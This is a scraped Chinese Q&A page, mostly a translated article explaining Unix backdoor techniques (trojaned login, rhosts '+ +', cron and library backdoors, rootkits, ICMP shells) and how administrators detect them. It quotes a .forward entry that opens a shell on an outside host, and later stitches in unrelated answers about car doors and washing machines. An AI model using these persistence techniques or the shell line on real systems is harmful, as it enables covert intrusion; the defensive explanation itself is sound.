什么是后门?怎么才能发现一款软件有后门?

作者&投稿:剧绿 (若有异议请与网页底部的电邮联系)
如何看软件有没后门?~

判断一个程序有没有后门,分析程序有没有加随系统启动功能,再用filemon监视,看该程序运行过程有没有释放什么东西出来。regmon可以监视一个程序读写注册表情况。

只要是后门,基本都会自动向某网站地址发送当前机器的IP等信息,让安装后门者知道中后门的机器的具体位置,然后连接控制,用WSockExpert可以监视一个或者多个程序的网络数据收发情况。

有些是定时连接某地址的,这个得通过反汇编来分析了,你用OllDbg来分析,如果是后门应该会找到后门里的地址,当然,反汇编前是得先脱壳的,如果有壳的话

用C32.然后把软件加载进去后,查找HTTP或WWW,之类的,如果是陌生的网址,可能就是后门,如果都是你熟悉的网址,那没事,如果软件真的发现后门了,一定要及时修改,不然不仅仅别 人修改你的软件那么简单了,发现后门后,把后门网址,修改成000之类的就行了

当一个训练有素的程序员设计一个功能较复杂的软件时,都习惯于先将整个软件分割为若干模块,然后再对各模块单独设计、调试,而后门则是一个模块的秘密入口。在程序开发期间,后门的存在是为了便于测试、更改和增强模块的功能。当然,程序员一般不会把后门记入软件的说明文档,因此用户通常无法了解后门的存在。
/  按照正常操作程序,在软件交付用户之前,程序员应该去掉软件模块中的后门,但是,由于程序员的疏忽,或者故意将其留在程序中以便日后可以对此程序进行隐蔽的访问,方便测试或维护已完成的程序等种种原因,实际上并未去掉。
这样,后门就可能被程序的作者所秘密使用,也可能被少数别有用心的人用穷举搜索法发现利用。

http://cache.baidu.com/c?word=%CA%B2%C3%B4%3B%CA%C7%3B%BA%F3%C3%C5&url=http%3A//www%2Exiaom%2Ecom/Article%5Fshow%2Easp%3FArticleID%3D4777&b=0&a=29&user=baidu

什么是后门?
从早期的计算机入侵者开始,他们就努力发展能使自己重返被入侵系统的技术或后门.本文将讨论许多常见的后门及其检测方法. 更多的焦点放在Unix系统的后门,同时讨论一些未来将会出现的Windows NT的后门. 本文将描述如何测定入侵者使用的方法这样的复杂内容和管理员如何防止入侵者重返的基础知识. 当管理员懂的一旦入侵者入侵后要制止他们是何等之难以后, 将更主动于预防第一次入侵. 本文试图涉及大量流行的初级和高级入侵者制作后门的手法, 但不会也不可能覆盖到所有可能的方法.

大多数入侵者的后门实现以下二到三个目的:

即使管理员通过改变所有密码类似的方法来提高安全性,仍然能再次侵入. 使再次侵入被发现的可能性减至最低.大多数后门设法躲过日志, 大多数情况下即使入侵者正在使用系统也无法显示他已在线. 一些情况下, 如果入侵者认为管理员可能会检测到已经安装的后门, 他们以系统的 脆弱性作为唯一的后门, 重而反复攻破机器. 这也不会引起管理员的注意. 所以在 这样的情况下,一台机器的脆弱性是它唯一未被注意的后门.

密码破解后门

这是入侵者使用的最早也是最老的方法, 它不仅可以获得对Unix机器的访问, 而且可以通过破解密码制造后门. 这就是破解口令薄弱的帐号. 以后即使管理员封了入侵者的当前帐号,这些新的帐号仍然可能是重新侵入的后门. 多数情况下, 入侵者寻找口令薄弱的未使用帐号,然后将口令改的难些. 当管理员寻找口令薄弱的帐号是, 也不会发现这些密码已修改的帐号.因而管理员很难确定查封哪个帐号.

Rhosts + + 后门

在连网的Unix机器中,象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简单的认证方法. 用户可以轻易的改变设置而不需口令就能进入. 入侵者只要向可以访问的某用户的rhosts文件中输入"+ +", 就可以允许任何人从任何地方无须口令便能进入这个帐号. 特别当home目录通过NFS向外共享时, 入侵者更热中于此. 这些帐号也成了入侵者再次侵入的后门. 许多人更喜欢使用Rsh, 因为它通常缺少日志能力. 许多管
理员经常检查 "+ +", 所以入侵者实际上多设置来自网上的另一个帐号的主机名和用户名,从而不易被发现.

校验和及时间戳后门

早期,许多入侵者用自己的trojan程序替代二进制文件. 系统管理员便依*时间戳和系统校验和的程序辨别一个二进制文件是否已被改变, 如Unix里的sum程序. 入侵者又发展了使trojan文件和原文件时间戳同步的新技术. 它是这样实现的: 先将系统时钟拨回到原文件时间, 然后调整trojan文件的时间为系统时间. 一旦二进制trojan文件与原来的精确同步, 就可以把系统时间设回当前时间. sum程序是基于CRC校验, 很容易
骗过.入侵者设计出了可以将trojan的校验和调整到原文件的校验和的程序. MD5是被大多数人推荐的,MD5使用的算法目前还没人能骗过.

Login后门

在Unix里,login程序通常用来对telnet来的用户进行口令验证. 入侵者获取login.c的原代码并修改,使它在比较输入口令与存储口令时先检查后门口令. 如果用户敲入后门口令,它将忽视管理员设置的口令让你长驱直入. 这将允许入侵者进入任何帐号,甚至是root.由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问的, 所以入侵者可以登录获取shell却不会暴露该帐号. 管理员注意到这种后门后, 便
用"strings"命令搜索login程序以寻找文本信息. 许多情况下后门口令会原形毕露.入侵者就开始加密或者更好的隐藏口令, 使strings命令失效. 所以更多的管理员是用MD5校验和检测这种后门的.

Telnetd后门

当用户telnet到系统, 监听端口的inetd服务接受连接随后递给in.telnetd,由它运行login.一些入侵者知道管理员会检查login是否被修改, 就着手修改in.telnetd.在in.telnetd内部有一些对用户信息的检验, 比如用户使用了何种终端. 典型的终端设置是Xterm或者VT100.入侵者可以做这样的后门, 当终端设置为"letmein"时产生一个不要任何验证的shell. 入侵者已对某些服务作了后门, 对来自特定源端口的连接产
生一个shell .

服务后门

几乎所有网络服务曾被入侵者作过后门. finger, rsh, rexec, rlogin, ftp, 甚至inetd等等的作了的版本随处多是. 有的只是连接到某个TCP端口的shell,通过后门口令就能获取访问.这些程序有时用刺娲□?ucp这样不用的服务,或者被加入inetd.conf作为一个新的服务.管理员应该非常注意那些服务正在运行, 并用MD5对原服务程序做校验.

Cronjob后门

Unix上的Cronjob可以按时间表调度特定程序的运行. 入侵者可以加入后门shell程序使它在1AM到2AM之间运行,那么每晚有一个小时可以获得访问. 也可以查看cronjob中经常运行的合法程序,同时置入后门.

库后门

几乎所有的UNIX系统使用共享库. 共享库用于相同函数的重用而减少代码长度. 一些入侵者在象crypt.c和_crypt.c这些函数里作了后门. 象login.c这样的程序调用了crypt(),当使用后门口令时产生一个shell. 因此, 即使管理员用MD5检查login程序,仍然能产生一个后门函数.而且许多管理员并不会检查库是否被做了后门.对于许多入侵者来说有一个问题: 一些管理员对所有东西多作了MD5校验. 有一种办法是入侵者对open()和文件访问函数做后门. 后门函数读原文件但执行trojan后门程序. 所以 当MD5读这些文件时,校验和一切正常. 但当系统运行时将执行trojan版本的. 即使trojan库本身也可躲过MD5校验. 对于管理员来说有一种方法可以找到后门, 就是静态编连MD5校验程序然后运行.静态连接程序不会使用trojan共享库.

内核后门

内核是Unix工作的核心. 用于库躲过MD5校验的方法同样适用于内核级别,甚至连静态连接多不能识别. 一个后门作的很好的内核是最难被管理员查找的, 所幸的是内核的后门程序还不是随手可得, 每人知道它事实上传播有多广.

文件系统后门

入侵者需要在服务器上存储他们的掠夺品或数据,并不能被管理员发现. 入侵者的文章常是包括exploit脚本工具,后门集,sniffer日志,email的备分,原代码,等等. 有时为了防止管理员发现这么大的文件, 入侵者需要修补"ls","du","fsck"以隐匿特定的目录和文件.在很低的级别, 入侵者做这样的漏洞: 以专有的格式在硬盘上割出一部分,且表示为坏的扇区. 因此入侵者只能用特别的工具访问这些隐藏的文件. 对于普通的
管理员来说, 很难发现这些"坏扇区"里的文件系统, 而它又确实存在.

Boot块后门

在PC世界里,许多病毒藏匿与根区, 而杀病毒软件就是检查根区是否被改变. Unix下,多数管理员没有检查根区的软件, 所以一些入侵者将一些后门留在根区.

隐匿进程后门

入侵者通常想隐匿他们运行的程序. 这样的程序一般是口令破解程序和监听程序 (sniffer).有许多办法可以实现,这里是较通用的: 编写程序时修改自己的argv[]使它看起来象其他进程名. 可以将sniffer程序改名类似in.syslog再执行. 因此当管理员用"ps"检查运行进程时, 出现 的是标准服务名. 可以修改库函数致使
"ps"不能显示所有进程. 可以将一个后门或程序嵌入中断驱动程序使它不会在进程表显现. 使用这个技术的一个后门例子是amod.tar.gz :

http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html

也可以修改内核隐匿进程.

Rootkit

最流行的后门安装包之一是rootkit. 它很容易用web搜索器找到.从Rootkit的README里,可以找到一些典型的文件:

z2 - removes entries from utmp, wtmp, and lastlog.
Es - rokstar's ethernet sniffer for sun4 based kernels.
Fix - try to fake checksums, install with same dates/perms/u/g.
Sl - become root via a magic password sent to login.
Ic - modified ifconfig to remove PROMISC flag from output.
ps: - hides the processes.
Ns - modified netstat to hide connections to certain machines.
Ls - hides certain directories and files from being listed.
du5 - hides how much space is being used on your hard drive.
ls5 - hides certain files and directories from being listed.

网络通行后门

入侵者不仅想隐匿在系统里的痕迹, 而且也要隐匿他们的网络通行. 这些网络通行后门有时允许入侵者通过防火墙进行访问. 有许多网络后门程序允许入侵者建立某个端口号并不用通过普通服务就能实现访问. 因为这是通过非标准网络端口的通行, 管理员可能忽视入侵者的足迹. 这种后门通常使用TCP,UDP和ICMP, 但也可能是其他类型报文.

TCP Shell 后门

入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCP Shell后门. 许多情况下,他们用口令进行保护以免管理员连接上后立即看到是shell访问. 管理员可以用netstat命令查看当前的连接状态, 那些端口在侦听, 目前连接的来龙去脉. 通常这些后门可以让入侵者躲过TCP Wrapper技术. 这些后门可以放在SMTP端口, 许多防火墙允许e-mail通行的.

UDP Shell 后门

管理员经常注意TCP连接并观察其怪异情况, 而UDP Shell后门没有这样的连接, 所以netstat不能显示入侵者的访问痕迹. 许多防火墙设置成允许类似DNS的UDP报文的通行. 通常入侵者将UDP Shell放置在这个端口, 允许穿越防火墙.

ICMP Shell 后门

Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一. 许多防火墙允许外界ping它内部的机器. 入侵者可以放数据入Ping的ICMP包, 在ping的机器间形成一个shell通道. 管理员也许会注意到Ping包暴风, 但除了他查看包内数据, 否者入侵者不会暴露.

加密连接

管理员可能建立一个sniffer试图某个访问的数据, 但当入侵者给网络通行后门加密后,就不可能被判定两台机器间的传输内容了.

Windows NT

由于Windows NT不能轻易的允许多个用户象Unix下访问一台机器, 对入侵者来说就很难闯入Windows NT,安装后门,并从那里发起攻击. 因此你将更频繁地看到广泛的来自Unix的网络攻击. 当Windows NT提高多用户技术后, 入侵者将更频繁地利用 WindowsNT.如果这一天真的到来, 许多Unix的后门技术将移植到Windows NT上, 管理员可以等候入侵者的到来. 今天, Windows NT已经有了telnet守护程序. 通过网络通行后门, 入侵者发现在Windows NT安装它们是可行的. ( With Network Traffic
backdoors, theyarevery feasible for intruders to install on Windows NT. 此处该如何翻译? :(

解决

当后门技术越先进, 管理员越难于判断入侵者是否侵入后者他们是否被成功封杀.

评估

首先要做的是积极准确的估计你的网络的脆弱性, 从而判定漏洞的存在且修复之.许多商业工具用来帮助扫描和查核网络及系统的漏洞. 如果仅仅安装提供商的安全补丁的话,许多公司将大大提高安全性.

MD5基准线

一个系统(安全)扫描的一个重要因素是MD5校验和基准线. MD5基准线是在黑客入侵前由干净系统建立. 一旦黑客入侵并建立了后门再建立基准线, 那么后门也被合并进去了.一些公司被入侵且系统被安置后门长达几个月.所有的系统备份多包含了后门. 当公司发现有黑客并求助备份祛除后门时, 一切努力是徒劳的, 因为他们恢复系统的同时也恢复了后门. 应该在入侵发生前作好基准线的建立.

入侵检测

随着各种组织的上网和允许对自己某些机器的连接,入侵检测正变的越来越重要.以前多数入侵检测技术是基于日志型的. 最新的入侵检测系统技术(IDS)是基于实时侦听和网络通行安全分析的. 最新的IDS技术可以浏览DNS的UDP报文, 并判断是否符合DNS协议请求. 如果数据不符合协议, 就发出警告信号并抓取数据进行进一步分析. 同样的原则可以运用到ICMP包, 检查数据是否符合协议要求, 或者是否装载加密shell会话.

从CD-ROM启动

一些管理员考虑从CD-ROM启动从而消除了入侵者在CD-ROM上做后门的可能性.这种方法的问题是实现的费用和时间够企业面临的.

警告

由于安全领域变化之快, 每天有新的漏洞被公布, 而入侵者正不断设计新的攻击和安置后门技术, 安枕无忧的安全技术是没有的.请记住没有简单的防御,只有不懈的努力!
( Be aware that no defense is foolproof, and that there is no substitute for
diligent attention. 此句该如何翻译? :( )
-------------------------------------------------------------------------
you may want to add:

.forward Backdoor

On Unix machines, placing commands into the .forward file was also
a common method of regaining access. For the account ``username''
a .forward file might be constructed as follows:

\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e
/bin/sh"

permutations of this method include alteration of the systems mail
aliases file (most commonly located at /etc/aliases). Note that
this is a simple permutation, the more advanced can run a simple
script from the forward file that can take arbitrary commands via
stdin (after minor preprocessing).

PS: The above method is also useful gaining access a companies
mailhub (assuming there is a shared a home directory FS on
&nbs>

the client and server).

> Using smrsh can effectively negate this backdoor (although it's quite
> possibly still a problem if you allow things like elm's filter or
> procmail which can run programs themselves...).

你也许要增加:

.forward后门

Unix下在.forward文件里放入命令是重新获得访问的常用方法. 帐户'username'的.forward可能设置如下:

\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e/bin/sh"

这种方法的变形包括改变系统的mail的别名文件(通常位于/etc/aliases). 注意这只是一种简单的变换. 更为高级的能够从.forward中运行简单脚本实现在标准输入执行任意命令(小部分预处理后).>利用smrsh可以有效的制止这种后门(虽然如果允许可以自运行的elm's filter或 procmail>类程序, 很有可能还有问题 ......)
参考资料:zhidao.baidu.com


雪佛兰后门内外都打不开,怎么才能打开
建议到维修店让师傅看一下,可能锁机卡住了,希望可以帮到你【汽车有问题,问汽车大师。4S店专业技师,10分钟解决。】

怎么看软件有没有后门?
呵呵,希望能帮到你· 如何判断一个软件有无后门 先去虚拟机里 打开软件啊 一般捆绑的软件会出问题啊 然后看下进程。有没有远控的进程。在杀毒啊 杀出来的毒百度搜下下看看是什么病毒啊 如何查看自己的系统有没有后门 利用杀毒软件,扫描利用防火墙,在防火墙看开启的端口及对应的进程,一般不是系统默认开启的...

我的电脑中了一种叫“后门”的病毒,请问怎么才能删除它?
到注册表中去看一下,有没有它的踪迹,将其删除,或者用杀毒盘启动系统,不让病毒驻留内存。

走后门怎么才能不尴尬的爆屎
1. 如何优雅地走后门,避免尴尬?2. 当你需要走后门时,确保有可靠的关系网。3. 你们之间的关系要足够亲近,这样走后门才会自然而不尴尬。

海马s5怎么在车内才能把后门打开
海马s5的两个后门内侧外沿,各有一个童锁开关(是一个关门后不可见的拨动开关(黑色小小的)),向内拨动为解除,在车内后排就可以自己打开车门了。如果后排有小孩乘坐,请务必拨到靠外的位置,这样就可以避免汽车行驶中后排车门被小孩打开。另外,停车后,拨动一下主驾驶位置的锁门开关,也可以临时解除...

西门子滚筒洗衣机怎么打开后门?
如果您洗衣机屏幕上钥匙符号亮起,说明开启了童锁功能,需要取消童锁功能后才能启动程序或是开门。不同类型的显示面板,开启及关闭童锁功能的方法不一致。介绍几种常见面板的操作方式。面板1:按住时钟按键5秒即可开启童锁功能,关闭方式一样。面板2:同时按住转速和预约按键5秒即可开启童锁功能,关闭方式...

面试被领导问及是否有“走后门”,你怎么应对?
其实真有这么一类人,他们特别反感走后门,因为他们相信自己的能力,期望公平竞争,即使失败也不后悔。对于这类人,你们让他们找后门最大的危害就是——我自己考研究生那会儿,顺利过了笔试进面试了,排名也很高。我亲戚打电话过来,要帮我面试找关系。当时我自己的第一反应就是排斥、厌恶,我立刻把电话...

后门里外都打不开怎么办
遇到后门内外都无法开启的情况,可以分为两种可能:首先,可能是锁块出现了故障。解决此类问题,应将车辆送到专业的汽修店进行检修,必要时更换新的锁块。强烈建议定期检查,特别是当门锁在使用过程中沾水后,容易导致锁块锈蚀,影响其正常工作。避免过多添加润滑油,以免形成结块,反而加重问题。其次,锁...

怎么区分车的前后门
不用区分,凭你喜好,你说前门是前门,你说后门是后门。

汽车后门关不上怎么办?
1、原因:中控锁锁不上某一扇车门,那么很有可能是门锁执行机构和门锁控制器出现故障。解决方法:建议车主要及时到维修店检修,通过检测仪可以快速检测到故障信息。2、原因:汽车中控锁常见故障一般有马达老化。解决方法:需要更换中控锁。3、原因:开关线路中的保险丝烧坏。解决方法:需要更换保险丝。4、原因...

敦煌市13650112832: 怎么检测软件有后门 -
徐诸凯西: 所谓后门一般指软件编写者特意留下为了提供软件出问题时便于修复的一种绕过检测方法的进入手段.或者是软件先天性的缺陷.可以绕过认证机制进入系统之内的一种BUG

敦煌市13650112832: 求教下,如何判断一个软件有没后门 -
徐诸凯西: 监视异常对外连接,可以有效的发现后门.需要注意的是后门有多种触发方式,人工,时间,关键词等等,比较复杂.总之,如果实在担心本机信息泄露,那就应该随时监视本机对外连接,发现异常、不明连接,立即断开并查找原因.PS:实际上很多软件都有后门,不用大惊小怪,这些后门是收集用户使用情况,故障反馈的作用,至少表面上是这样说的.传言中,windows,office都有后门.

敦煌市13650112832: 怎样检测一个软件是否有后门? -
徐诸凯西: ..用C32.然后把软件加载进去后,查找HTTP或WWW,之类的,如果是陌生的网址,可能就是后门,如果都是你熟悉的网址,那没事,如果软件真的发现后门了,一定要及时修改,不然不仅仅别 人修改你的软件那么简单了,发现后门后,把后门网址,修改成000之类的就行了

敦煌市13650112832: 怎样检测一个软件是否有后门?
徐诸凯西: OD和C32AM只是反汇编工具,OD可以动态调试,但是不能自动检测出木马或后门,只能人工分析汇编代码,动态调试后,才能分析出是否含有后门代码.

敦煌市13650112832: 怎样知道软件是否被人加后门?
徐诸凯西: 你是玩黑的.就应该知道影子系统.虚拟机这些东西是干什么的. 清除入查找办法: 第一步.用PEID及捆绑检测工具. 第二步.用C32打开.如果有两个或两个以上的PE头就要注意了.另外还要注意里面"HTTP://XXX"的这的东西.因为这可能带有下载功能. 第三步.用下载者监视器.文件监督器这样的工具. 你师傅连这些最基本的都没有教你给.你应该回去抽 他.

敦煌市13650112832: 怎么样才能知道黑客软件有没有后门呀?
徐诸凯西: 判断一个程序有没有后门,分析程序有没有加随系统启动功能,再用filemon监视,看该程序运行过程有没有释放什么东西出来.regmon可以监视一个程序读写注册表情况. 只要是后门,基本都会自动向某网站地址发送当前机器的IP等信息,让安装后门者知道中后门的机器的具体位置,然后连接控制,用WSockExpert可以监视一个或者多个程序的网络数据收发情况. 有些是定时连接某地址的,这个得通过反汇编来分析了,你用OllDbg来分析,如果是后门应该会找到后门里的地址,当然,反汇编前是得先脱壳的,如果有壳的话

敦煌市13650112832: 如何知道exe这个程序有没有后门或者捆绑木马之类的? -
徐诸凯西: 先看软件是不是比一般的大.一般工具如果比正常的大基本上多是有留后门和捆绑木马. 因为黑软一般无后门,也会被报毒.所以实在不好识别是否存在后门,只有手工.1、在运行可疑文件前,打开目录C:\WINDOWS和C:\WINDOWS\system...

敦煌市13650112832: 什么是软件后门?每个软件都有吗
徐诸凯西: 当一个训练有素的程序员设计一个功能较复杂的软件时,都习惯于先将整个软件分割为若干模块,然后再对各模块单独设计、调试,而后门则是一个模块的秘密入口.在程序开发期间,后门的存在是为了便于测试、更改和增强模块的功能.当然,程序员一般不会把后门记入软件的说明文档,因此用户通常无法了解后门的存在. /按照正常操作程序,在软件交付用户之前,程序员应该去掉软件模块中的后门,但是,由于程序员的疏忽,或者故意将其留在程序中以便日后可以对此程序进行隐蔽的访问,方便测试或维护已完成的程序等种种原因,实际上并未去掉. 这样,后门就可能被程序的作者所秘密使用,也可能被少数别有用心的人用穷举搜索法发现利用.

敦煌市13650112832: 黑客中说的后门什么意思? -
徐诸凯西: 即为后门程序,跟我们通常所说的"木马"有联系也有区别. 联系在于:都是隐藏在用户系统中向外发送信息,而且本身具有一定权限,以便远程机器对本机的控制. 区别在于:木马是一个完整的软件,而后门则体积较小且功能都很单一. 而且...

敦煌市13650112832: 什么是"后门程序"??
徐诸凯西: 后门程序又称特洛伊木马,其用途在于潜伏在电脑中,从事搜集信息或便于黑客进入的动作.后程序和电脑病毒最大的差别,在于后门程序不一定有自我复制的动作,也就是后门程序不一定会“感染”其他电脑.

本站内容来自于网友发表,不代表本站立场,仅表示其个人看法,不对其真实性、正确性、有效性作任何的担保
相关事宜请发邮件给我们
© 星空见康网